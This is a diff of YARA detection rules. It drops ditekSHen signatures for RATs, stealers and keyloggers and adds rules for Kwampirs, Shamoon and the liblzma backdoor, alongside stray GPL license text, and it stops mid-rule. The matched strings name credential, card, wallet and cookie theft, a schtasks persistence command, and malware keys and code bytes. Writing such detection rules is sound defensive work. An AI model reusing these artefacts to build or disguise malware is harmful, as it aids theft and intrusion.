-		logic_hash = "8ae35c5fa48773b93da0b76b238fc8dbaf19fdeb6fd81bf23842c5121d620116"
-		score = 75
-		quality = 75
-		tags = "FILE"
+    <program>  Copyright (C) <year>  <name of author>
+    This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
+    This is free software, and you are welcome to redistribute it
+    under certain conditions; type `show c' for details.
 
-	strings:
-		$s1 = "schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr" wide
-		$s2 = "\\vboxhook.dll" fullword wide
-		$s3 = "Win32_Processor.deviceid=\"CPU0\"" fullword wide
-		$s4 = "select CommandLine from Win32_Process where Name='{0}'" wide
-		$s5 = "Minning..." fullword wide
-		$s6 = "Regasm.exe" fullword wide
-		$s7 = "Flood!" fullword wide
-		$s8 = "Rans-Status" fullword wide
-		$s9 = "cmd.exe /c ping 0" wide
+The hypothetical commands `show w' and `show c' should show the appropriate
+parts of the General Public License.  Of course, your program's commands
+might be different; for a GUI interface, you would use an "about box".
 
-	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
-}
-rule DITEKSHEN_MALWARE_Win_Arkei : FILE
-{
-	meta:
-		description = "Detect Arkei infostealer variants"
-		author = "ditekSHen"
-		id = "d32a27bf-abb9-553c-9913-d675c340a5c5"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L210-L226"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8a79bcc6ac94900c8a8913b2e81424bf900bbac416f44a91db6f208f23980155"
-		score = 75
-		quality = 75
-		tags = "FILE"
+  You should also get your employer (if you work as a programmer) or school,
+if any, to sign a "copyright disclaimer" for the program, if necessary.
+For more information on this, and how to apply and follow the GNU GPL, see
+<https://www.gnu.org/licenses/>.
 
-	strings:
-		$s1 = "C:\\Windows\\System32\\cmd.exe" fullword ascii wide
-		$s2 = "/c taskkill /im " fullword ascii
-		$s3 = "card_number_encrypted FROM credit_cards" ascii
-		$s4 = "\\wallet.dat" ascii
-		$s5 = "Arkei/" wide
-		$s6 = "files\\passwords." ascii wide
-		$s7 = "files\\cc_" ascii wide
-		$s8 = "files\\autofill_" ascii wide
-		$s9 = "files\\cookies_" ascii wide
+  The GNU General Public License does not permit incorporating your program
+into proprietary programs.  If your program is a subroutine library, you
+may consider it more useful to permit linking proprietary applications with
+the library.  If this is what you want to do, use the GNU Lesser General
+Public License instead of this License.  But first, please read
+<https://www.gnu.org/licenses/why-not-lgpl.html>.
 
-	condition:
-		uint16( 0 ) == 0x5a4d and all of them
-}
-rule DITEKSHEN_MALWARE_Win_Obliquerat : FILE
+ */
+rule CRAIU_Apt_ZZ_Orangeworm_Kwampirs_Dropperandmainpayload : KWAMPIRS
 {
 	meta:
-		description = "ObliqueRAT payload"
-		author = "ditekSHen"
-		id = "5a184299-6c16-56b3-88da-37435fbfcde5"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L294-L314"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0b8bbf031364b828a972c52e1a8985ff65601ca7413e6e7ae3a5be981f086b9e"
+		description = "Kwampirs dropper and main payload components"
+		author = "Symantec"
+		id = "5a40a5e7-0b98-5f6e-a808-493676b57cda"
+		date = "2018-04-23"
+		modified = "2020-03-31"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia"
+		source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/apt_zz_orangeworm.yara#L2-L80"
+		license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE"
+		logic_hash = "40e197f4278a2d14e8fe1359676558319e86728f7e61ddf612bcc894c311d53a"
 		score = 75
-		quality = 25
-		tags = "FILE"
+		quality = 85
+		tags = "KWAMPIRS"
+		family = "Kwampirs"
 
 	strings:
-		$s1 = "C:\\ProgramData\\auto.txt" fullword ascii
-		$s2 = "C:\\ProgramData\\System\\Dump\\" fullword ascii
-		$s3 = "C:\\ProgramData\\a.txt" fullword ascii
-		$s4 = "Oblique" fullword ascii
-		$s5 = /(Removable|Hard|Network|CD|RAM)\sDisk\|/ ascii
-		$s6 = "backed" fullword ascii
-		$s7 = "restart" fullword ascii
-		$s8 = "kill" fullword ascii
-		$s9 = /(John|JOHN|Test|TEST|Johsnson|Artifact|Vince|Serena|Lisa|JOHNSON|VINCE|SERENA)/ ascii nocase
-		$v1 = "C:\\ProgramData" fullword ascii
-		$v2 = "auto" fullword ascii
-		$v3 = "plit" fullword ascii
-		$v4 = ":image/jpeg" fullword wide
+		$pubkey = {
+            06 02 00 00 00 A4 00 00 52 53 41 31 00 08 00 00
+            01 00 01 00 CD 74 15 BC 47 7E 0A 5E E4 35 22 A5
+            97 0C 65 BE E0 33 22 F2 94 9D F5 40 97 3C 53 F9
+            E4 7E DD 67 CF 5F 0A 5E F4 AD C9 CF 27 D3 E6 31
+            48 B8 00 32 1D BE 87 10 89 DA 8B 2F 21 B4 5D 0A
+            CD 43 D7 B4 75 C9 19 FE CC 88 4A 7B E9 1D 8C 11
+            56 A6 A7 21 D8 C6 82 94 C1 66 11 08 E6 99 2C 33
+            02 E2 3A 50 EA 58 D2 A7 36 EE 5A D6 8F 5D 5D D2
+            9E 04 24 4A CE 4C B6 91 C0 7A C9 5C E7 5F 51 28
+            4C 72 E1 60 AB 76 73 30 66 18 BE EC F3 99 5E 4B
+            4F 59 F5 56 AD 65 75 2B 8F 14 0C 0D 27 97 12 71
+            6B 49 08 84 61 1D 03 BA A5 42 92 F9 13 33 57 D9
+            59 B3 E4 05 F9 12 23 08 B3 50 9A DA 6E 79 02 36
+            EE CE 6D F3 7F 8B C9 BE 6A 7E BE 8F 85 B8 AA 82
+            C6 1E 14 C6 1A 28 29 59 C2 22 71 44 52 05 E5 E6
+            FE 58 80 6E D4 95 2D 57 CB 99 34 61 E9 E9 B3 3D
+            90 DC 6C 26 5D 70 B4 78 F9 5E C9 7D 59 10 61 DF
+            F7 E4 0C B3
+        }
+		$network_xor_key = {
+            B7 E9 F9 2D F8 3E 18 57 B9 18 2B 1F 5F D9 A5 38
+            C8 E7 67 E9 C6 62 9C 50 4E 8D 00 A6 59 F8 72 E0
+            91 42 FF 18 A6 D1 81 F2 2B C8 29 EB B9 87 6F 58
+            C2 C9 8E 75 3F 71 ED 07 D0 AC CE 28 A1 E7 B5 68
+            CD CF F1 D8 2B 26 5C 31 1E BC 52 7C 23 6C 3E 6B
+            8A 24 61 0A 17 6C E2 BB 1D 11 3B 79 E0 29 75 02
+            D9 25 31 5F 95 E7 28 28 26 2B 31 EC 4D B3 49 D9
+            62 F0 3E D4 89 E4 CC F8 02 41 CC 25 15 6E 63 1B
+            10 3B 60 32 1C 0D 5B FA 52 DA 39 DF D1 42 1E 3E
+            BD BC 17 A5 96 D9 43 73 3C 09 7F D2 C6 D4 29 83
+            3E 44 44 6C 97 85 9E 7B F0 EE 32 C3 11 41 A3 6B
+            A9 27 F4 A3 FB 2B 27 2B B6 A6 AF 6B 39 63 2D 91
+            75 AE 83 2E 1E F8 5F B5 65 ED B3 40 EA 2A 36 2C
+            A6 CF 8E 4A 4A 3E 10 6C 9D 28 49 66 35 83 30 E7
+            45 0E 05 ED 69 8D CF C5 40 50 B1 AA 13 74 33 0F
+            DF 41 82 3B 1A 79 DC 3B 9D C3 BD EA B1 3E 04 33
+        }
+		$decrypt_string = {
+            85 DB 75 09 85 F6 74 05 89 1E B0 01 C3 85 FF 74
+            4F F6 C3 01 75 4A 85 F6 74 46 8B C3 D1 E8 33 C9
+            40 BA 02 00 00 00 F7 E2 0F 90 C1 F7 D9 0B C8 51
+            E8 12 28 00 00 89 06 8B C8 83 C4 04 33 C0 85 DB
+            74 16 8B D0 83 E2 0F 8A 92 1C 33 02 10 32 14 38
+            40 88 11 41 3B C3 72 EA 66 C7 01 00 00 B0 01 C3
+            32 C0 C3
+        }
+		$init_strings = {
+            55 8B EC 83 EC 10 33 C9 B8 0D 00 00 00 BA 02 00
+            00 00 F7 E2 0F 90 C1 53 56 57 F7 D9 0B C8 51 E8
+            B3 27 00 00 BF 05 00 00 00 8D 77 FE BB 4A 35 02
+            10 2B DE 89 5D F4 BA 48 35 02 10 4A BB 4C 35 02
+            10 83 C4 04 2B DF A3 C8 FC 03 10 C7 45 FC 00 00
+            00 00 8D 4F FC 89 55 F8 89 5D F0 EB 06
+        }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 8 of them
+		(2 of them )
 }
-rule DITEKSHEN_MALWARE_Win_Firebirdrat : FILE
+rule CRAIU_Apt_ZZ_Orangeworm_Kwampirs_Shamoon_Code : FILE
 {
 	meta:
-		description = "Firebird/Hive RAT payload"
-		author = "ditekSHen"
-		id = "456ae70e-8004-5fb0-a4fd-ce7c0f4704f9"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L316-L339"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1c24e924171db1b99a3b03764f4551b6f4b6b1c9c6147b49dbc0651e85e9040c"
+		description = "Kwampirs and Shamoon common code"
+		author = "FBI / cywatch@fbi.gov"
+		id = "0d403b3b-a5a8-5ac6-a12d-7181a1ad11b3"
+		date = "2020-01-14"
+		modified = "2020-03-31"
+		reference = "https://assets.documentcloud.org/documents/6821582/FLASH-CP-000118-MW-Downgraded-Version.pdf"
+		source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/apt_zz_orangeworm.yara#L85-L105"
+		license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE"
+		logic_hash = "5ab949280be87d242ad2843dee001eee5a338e266ef52da55883f7c77e66cf5b"
 		score = 75
-		quality = 73
+		quality = 85
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.Firebird-HiveRAT"
+		yara_version = "3.7.0"
 
 	strings:
-		$id1 = "Firebird Remote Administration Tool" fullword wide
-		$id2 = "Welcome to Firebird! Your system is currently being monitored" wide
-		$id3 = "Hive Remote Administration Tool" fullword wide
-		$id4 = "Welcome to Hive! Your system is currently being monitored" wide
-		$s1 = "REPLACETHESEKEYSTROKES" fullword wide
-		$s2 = "_ENABLE_PROFILING" fullword wide
-		$s3 = ": KeylogSubject" wide
-		$s4 = "Firebird.CommandHandler" fullword wide
-		$s5 = "webcamenabled" fullword ascii
-		$s6 = "screenlogs" fullword ascii
-		$s7 = "encryptedconnection" fullword ascii
-		$s8 = "monitoron" fullword ascii
-		$s9 = "screenGrab" fullword ascii
-		$s10 = "TCP_TABLE_OWNER_PID_ALL" fullword ascii
-		$s11 = "de4fuckyou" fullword ascii
+		$memcpy = { 56 8B F0 85 FF 74 19 85 D2 74 15 8B CF 85 F6 74 0B 2B D7 8A 04 0A 88 01 41 4E 75 F7 8B C7 5E C3 33 C0 5E C3 }
+		$strlenW = { 33 C0 85 C9 74 17 80 3C 41 00 75 07 80 7C 41 01 00 74 0A 3D 00 94 35 77 73 03 40 EB E9 C3 }
+		$strcmp = { 85 C0 75 07 85 D2 75 40 B0 01 C3 85 D2 74 39 66 83 38 00 56 74 24 0F B7 0A 66 85 C9 74 16
+		66 8B 30 83 C2 02 83 C0 02 66 3B F1 75 18 66 83 38 00 75 E4 EB 06 66 83 38 00 75 0A 66 83 3A 00 75 04 B0
+		01 5E C3 32 C0 5E C3 32 C0 C3 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $id* ) or 7 of ( $s* ) )
-}
-rule DITEKSHEN_MALWARE_Win_Phoenix : FILE
-{
-	meta:
-		description = "Phoenix/404KeyLogger keylogger payload"
-		author = "ditekSHen"
-		id = "62101881-9b5e-586d-8e1b-184787f25d6b"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L341-L367"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b2c2a4ffc36d708a121853fb0268e6dc85b3fe2cd58e05c8124cbef18e03ec0b"
+		( uint16( 0 ) == 0x5a4d ) and ( 1 of them )
+}
+rule CRAIU_Apt_ZZ_Orangeworm_Kwampirs_Installer : FILE
+{
+	meta:
+		description = "Kwampirs installer xor keys and Unicode string length routine"
+		author = "FBI / cywatch@fbi.gov"
+		id = "8c80d0d5-8c65-5cef-ad86-b38f4d671bec"
+		date = "2020-01-14"
+		modified = "2020-03-31"
+		reference = "https://assets.documentcloud.org/documents/6821582/FLASH-CP-000118-MW-Downgraded-Version.pdf"
+		source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/apt_zz_orangeworm.yara#L109-L127"
+		license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE"
+		logic_hash = "ac9c3ba7188cbbe736ff81b41086fdc874ac24ae83d3cec390907f8edd0a0ce5"
 		score = 75
-		quality = 75
+		quality = 85
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.Phoenix-Keylogger"
+		yara_version = "3.7.0"
 
 	strings:
-		$s1 = "FirefoxPassReader" fullword ascii
-		$s2 = "StartKeylogger" fullword ascii
-		$s3 = "CRYPTPROTECT_" ascii
-		$s4 = "Chrome_Killer" fullword ascii
-		$s5 = "Clipboardlog.txt" fullword wide
-		$s6 = "Leyboardlogs.txt" fullword wide
-		$s7 = "Persistence'" wide
-		$s8 = "set_HKB" fullword ascii
-		$s9 = "loloa" fullword ascii
-		$s10 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)" fullword wide
-		$m1 = "- Screenshot -------|" ascii wide
-		$m2 = "- Clipboard -------|" ascii wide
-		$m3 = "- Logs -------|" ascii wide
-		$m4 = "- Passwords -------|" ascii wide
-		$m5 = "PSWD" ascii wide
-		$m6 = "Screenshot |" ascii wide
-		$m7 = "Logs |" ascii wide
+		$string_key = { 6C 35 E3 31 1B 23 F9 C9 65 EB F3 07 93 33 F2 A3 }
+		$resource_key = { 28 99 B6 17 63 33 EE 22 97 97 55 B5 7A C4 E1 A4 }
+		$strlenW = { 33 C0 85 C9 74 17 80 3C 41 00 75 07 80 7C 41 01 00 74 0A 3D 00 94 35 77 73 03 40 EB E9 C3}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and 6 of ( $s* ) or 3 of ( $m* ) ) or 9 of them
+		(( uint16( 0 ) == 0x5a4d ) and ( 2 of them ) )
 }
-rule DITEKSHEN_MALWARE_Win_Backnet : FILE
+rule CRAIU_Apt_ZZ_Orangeworm_Kwampirs_Implant : FILE
 {
 	meta:
-		description = "BackNet payload"
-		author = "ditekSHen"
-		id = "c53ef72f-4957-5ddb-b096-dcdb69cf900d"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L369-L386"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c276f2b809caad680455fc4ca0a021887d4ff2c9114f05737542a1d3c5cca848"
+		description = "Kwampirs implant xor and rsa keys"
+		author = "FBI / cywatch@fbi.gov"
+		id = "d1c1ab0e-e07d-5f0e-97e8-5aee53ab620e"
+		date = "2020-01-14"
+		modified = "2020-03-31"
+		reference = "https://assets.documentcloud.org/documents/6821582/FLASH-CP-000118-MW-Downgraded-Version.pdf"
+		source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/apt_zz_orangeworm.yara#L130-L177"
+		license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE"
+		logic_hash = "a9559c17c802c6060799d0a1ee96d68bd521475dd12ff6040a74874cabe3a9a9"
 		score = 75
-		quality = 75
+		quality = 85
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.BackNet"
+		yara_version = "3.7.0"
 
 	strings:
-		$s1 = "Slave.Commands." fullword ascii
-		$s2 = "StartKeylogger" fullword ascii
-		$s3 = "StopKeylogger" fullword ascii
-		$s4 = "KeyLoggerCommand" fullword ascii
-		$s5 = "get_keyLoggerManager" fullword ascii
-		$s6 = "get_IgnoreMutex" fullword ascii
-		$s7 = "ListProcesses" fullword ascii
-		$s8 = "downloadurl" fullword wide
-		$pdb = "\\BackNet-master\\Slave\\obj\\Release\\Slave.pdb" ascii
+		$string_key = { 6C 35 E3 31 1B 23 F9 C9 65 EB F3 07 93 33 F2 A3 }
+		$beacon_key = { 28 30 A4 3F 6D 28 04 23 36 2A 32 DC AD 0B A0 4B E8 20 1F 64 84 0A F4 C4 C7 8A 8D C0
+                        A2 C4 40 19 A1 43 82 38 14 FD 6C 90 E0 7E 2A 40 DF D3 F2 3E 72 38 C4 96 4D 98 7C 16 3B 3C E7 27 B7 D0 EF
+                        7B 3C 45 06 9A 69 0D 6A 41 18 95 95 46 88 CC 19 6F EB 6B 5B F8 51 E4 2E E1 E6 8F 44 CF 20 2F 2B DE 7A 28
+                        5D DB 55 5A 1A 35 AF D8 5F 57 B8 0F A5 F7 08 4A D0 AB E5 95 31 A1 25 31 00 65 3C 70 73 99 42 0A 02 1A 69
+                        D9 A6 DF 14 B2 05 DD A8 DF F5 D9 71 6D 6E 96 5F 1B D1 0F 8E 0A 35 D4 65 FA 90 58 CC 75 02 92 B7 2C 46 ED
+                        66 33 44 75 FC A4 E0 FD B8 C8 B5 0C 3A 84 D9 23 16 A4 AF 3B 57 C6 D2 5C B3 AB 9C CD F0 B2 A4 51 43 D3 F0
+                        30 21 B5 ED 25 E3 64 B7 0C 1C A8 50 3A FF 6B 2C 32 06 B2 D1 54 3D 86 B9 1A BF 59 D7 92 59 EC 40 4A 8D B0
+                        E7 9A 9A 0D 94 19 27 D8 6D AD 5C 3E BE 14 67 DC F0 92 }
+		$download_key = { B7 E9 F9 2D F8 3E 18 57 B9 18 2B 1F 5F D9 A5 38 C8 E7 67 E9 C6 62 9C 50 4E 8D 00
+                        A6 59 F8 72 E0 91 42 FF 18 A6 D1 81 F2 2B C8 29 EB B9 87 6F 58 C2 C9 8E 75 3F 71 ED 07 D0 AC CE 28 A1 E7
+                        B5 68 CD CF F1 D8 2B 26 5C 31 1E BC 52 7C 23 6C 3E 6B 8A 24 61 0A 17 6C E2 BB 1D 11 3B 79 E0 29 75 02 D9
+                        25 31 5F 95 E7 28 28 26 2B 31 EC 4D B3 49 D9 62 F0 3E D4 89 E4 CC F8 02 41 CC 25 15 6E 63 1B 10 3B 60 32
+                        1C 0D 5B FA 52 DA 39 DF D1 42 1E 3E BD BC 17 A5 96 D9 43 73 3C 09 7F D2 C6 D4 29 83 3E 44 44 6C 97 85 9E
+                        7B F0 EE 32 C3 11 41 A3 6B A9 27 F4 A3 FB 2B 27 2B B6 A6 AF 6B 39 63 2D 91 75 AE 83 2E 1E F8 5F B5 65 ED
+                        B3 40 EA 2A 36 2C A6 CF 8E 4A 4A 3E 10 6C 9D 28 49 66 35 83 30 E7 45 0E 05 ED 69 8D CF C5 40 50 B1 AA 13
+                        74 33 0F DF 41 82 3B 1A 79 DC 3B 9D C3 BD EA B1 3E 04 33 }
+		$hashfile_key = { FE FE F5 5C 37 54 A1 6C 28 84 ED BF 84 70 25 41 56 24 37 32 98 9F A0 35 48 F3 1C 33
+                        2E F9 D0 A3 7D 36 BA 66 ED FB 52 E3 8B 07 32 5A 1A DD 19 0A F0 73 A8 C6 61 3F 3F 31 8A 93 AB F4 19 AA D8
+                        42 3B 3E 6E FC 0A 2A 41 1B 28 33 7F 79 27 41 81 14 D0 0B 24 06 4C 35 B3 23 5C F2 E4 06 7D 73 93 1C 7A 30
+                        8E 87 74 0F 53 F9 92 A3 CA 20 E3 A1 12 E1 6B 86 62 B6 CC C1 45 C9 43 43 15 59 BE 5A 77 31 D8 36 5F BD F6
+                        D7 09 65 42 3C CD 2C B1 C1 28 55 6E F9 91 3C 55 3B DF EB ED BF 84 70 25 41 56 24 37 32 98 9F A0 35 48 F3
+                        1C 33 2E F9 D0 A3 7D 36 BA 66 ED FB 52 E3 8B 07 32 5A 1A DD 19 0A F0 73 A8 C6 61 3F 3F 31 8A 93 AB F4 19
+                        AA D8 42 3B 3E 6E FC 0A 2A 41 1B 28 33 7F 79 27 41 81 14 D0 0B 24 06 4C 35 B3 23 5C F2 E4 06 7D 73 93 1C
+                        7A 30 8E 87 74 0F 53 F9 92 A3 CA 20 E3 A1 12 E1 6B 86 }
+		$rsa_key = { CD 74 15 BC 47 7E 0A 5E E4 35 22 A5 97 0C 65 BE E0 33 22 F2 94 9D F5 40 97 3C 53 F9 E4 7E
+                        DD 67 CF 5F 0A 5E F4 AD C9 CF 27 D3 E6 31 48 B8 00 32 1D BE 87 10 89 DA 8B 2F 21 B4 5D 0A CD 43 D7 B4
+                        75 C9 19 FE CC 88 4A 7B E9 1D 8C 11 56 A6 A7 21 D8 C6 82 94 C1 66 11 08 E6 99 2C 33 02 E2 3A 50 EA 58 D2
+                        A7 36 EE 5A D6 8F 5D 5D D2 9E 04 24 4A CE 4C B6 91 C0 7A C9 5C E7 5F 51 28 4C 72 E1 60 AB 76 73 30 66 18
+                        BE EC F3 99 5E 4B 4F 59 F5 56 AD 65 75 2B 8F 14 0C 0D 27 97 12 71 6B 49 08 84 61 1D 03 BA A5 42 92 F9 13
+                        33 57 D9 59 B3 E4 05 F9 12 23 08 B3 50 9A DA 6E 79 02 36 EE CE 6D F3 7F 8B C9 BE 6A 7E BE 8F 85 B8 AA 82
+                        C6 1E 14 C6 1A 28 29 59 C2 22 71 44 52 05 E5 E6 FE 58 80 6E D4 95 2D 57 CB 99 34 61 E9 E9 B3 3D 90 DC 6C
+                        26 5D 70 B4 78 F9 5E C9 7D 59 10 61 DF F7 E4 0C B3 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( $pdb or all of ( $s* ) )
+		(( uint16( 0 ) == 0x5a4d ) and ( 2 of them ) )
 }
-rule DITEKSHEN_MALWARE_Win_Acridrain : FILE
+rule CRAIU_Apt_ZZ_Orangeworm_Kwampirs_Shamoon : FILE
 {
 	meta:
-		description = "AcidRain stealer payload"
-		author = "ditekSHen"
-		id = "9890c9e0-ce53-5f08-9077-c73a9e4ba29c"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L388-L401"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "11884073f4bf466503b07f297ae7fad188f79df148fcc7ca48827c7dbd07e211"
+		description = "Kwampirs Shamoon overlap"
+		author = "FBI / cywatch@fbi.gov"
+		id = "87d28867-383e-5e09-8369-63c8a4e3f966"
+		date = "2020-01-14"
+		modified = "2020-03-31"
+		reference = "https://assets.documentcloud.org/documents/6821582/FLASH-CP-000118-MW-Downgraded-Version.pdf"
+		source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/apt_zz_orangeworm.yara#L200-L221"
+		license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE"
+		logic_hash = "43f352c3db016d2831d11a13ae6c0baf440fa464560090e00432780df6a8982d"
 		score = 75
-		quality = 75
+		quality = 60
 		tags = "FILE"
 
 	strings:
-		$s1 = { 43 6f 6f 6b 69 65 73 (5c|2e) }
-		$s2 = { 74 65 6d 70 6c 6f 67 69 ?? }
-		$s3 = { 74 65 6d 70 50 ?? 68 }
-		$s4 = "Connecting to hostname: %s%s%s" fullword ascii
-		$s5 = "Found bundle for host %s: %p [%s]" fullword ascii
-		$s6 = "encryptedUsernamencryptedPassworERROR Don't copy string" fullword ascii
+		$s1 = "g\\system32\\" fullword wide
+		$s2 = "ztvttw" fullword wide
+		$s3 = "lwizvm" fullword ascii
+		$op1 = { 94 35 77 73 03 40 eb e9 }
+		$op2 = { 80 7c 41 01 00 74 0a 3d }
+		$op3 = { 74 0a 3d 00 94 35 77 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		(( uint16( 0 ) == 0x5a4d ) and ( filesize < 4000KB ) and ( 3 of them ) )
 }
-rule DITEKSHEN_MALWARE_Linux_Chachaddos : FILE
+rule CRAIU_Unk_Liblzma_Backdoor : FILE
 {
 	meta:
-		description = "ChaChaDDoS variant of XorDDoS payload"
-		author = "ditekSHen"
-		id = "78a5cf3a-0e84-59bd-a936-bd335647e3d0"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L403-L418"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2bf99771046650820f02a24d5bd825afeacd03d1e865b05d8563a3ef74d521fb"
+		description = "liblzma backdoored"
+		author = "Costin G. Raiu, Art of Noh, craiu@noh.ro"
+		id = "3527227b-e19f-5704-8a56-f7d318890658"
+		date = "2024-03-30"
+		modified = "2024-03-30"
+		reference = "https://seclists.org/oss-sec/2024/q1/268"
+		source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/unk_liblzma_backdoor.yara#L1-L30"
+		license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE"
+		hash = "8fa641c454c3e0f76de73b7cc3446096b9c8b9d33d406d38b8ac76090b0344fd"
+		hash = "319feb5a9cddd81955d915b5632b4a5f8f9080281fb46e2f6d69d53f693c23ae"
+		hash = "b418bfd34aa246b2e7b5cb5d263a640e5d080810f767370c4d2c24662a274963"
+		hash = "cbeef92e67bf41ca9c015557d81f39adaba67ca9fb3574139754999030b83537"
+		logic_hash = "ac58a38bff3020dbc881a78b70cf18279644cf6f3ede8d652be3f345ba00974f"
 		score = 75
-		quality = 75
+		quality = 85
 		tags = "FILE"
+		version = "1.1"
 
 	strings:
-		$x1 = "[kworker/1:1]" ascii
-		$x2 = "-- LuaSocket toolkit." ascii
-		$x3 = "/etc/resolv.conf" ascii
-		$x4 = "\"macaddress=\" .. DEVICE_MAC .. \"&device=\" .." ascii
-		$x5 = "easy_attack_dns" ascii
-		$x6 = "easy_attack_udp" ascii
-		$x7 = "easy_attack_syn" ascii
-		$x8 = "syn_probe" ascii
+		$a1 = {f3 0f 1e fa 55 48 89 f5 4c 89 ce 53 89 fb 81 e7 00 00 00 80 48 83 ec 28 48 89 54 24 18 48 89 4c 24 10}
+		$a2 = {48 BF 30 30 30 30 30 30 30 30 8B F1 49 89 D1 89 43 28 48 89 3C 24 BF 3F FC FF 03}
 
 	condition:
-		uint16( 0 ) == 0x457f and 6 of them
+		( uint32be( 0 ) == 0x7F454C46 ) and ( filesize < 10MB ) and ( any of them )
 }
-rule DITEKSHEN_MALWARE_Multi_Exaramel : FILE
+rule CRAIU_Unk_Liblzma_Encstrings : FILE
 {
 	meta:
-		description = "Exaramel Windows/Linux backdoor payload"
-		author = "ditekSHen"
-		id = "014f10f3-4502-5719-93f6-4b2940f53876"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L420-L459"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e64383304bc913b07a2e63d61c81354b996c01171357005f4a28957d4d889599"
+		description = "liblzma backdoor, encoded strings"
+		author = "Costin G. Raiu, Art of Noh, craiu@noh.ro"
+		id = "ca491b9c-400e-5f5e-9372-e403a095edba"
+		date = "2024-03-30"
+		modified = "2024-03-30"
+		reference = "https://gist.github.com/q3k/af3d93b6a1f399de28fe194add452d01"
+		source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/unk_liblzma_backdoor.yara#L32-L70"
+		license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE"
+		logic_hash = "99f5c82f941bb5c1f908209e108f9f80a835ad84157a383faa0dde502486dbd3"
 		score = 75
-		quality = 73
+		quality = 85
 		tags = "FILE"
-		clamav_sig1 = "MALWARE_Linux.Backdoor.Exaramel"
-		clamav_sig2 = "MALWARE_Win.Backdoor.Exaramel"
+		version = "1.0"
 
 	strings:
-		$s1 = "vendor/golang_org/x/crypto/" ascii
-		$s2 = "vendor/golang_org/x/net/http2" ascii
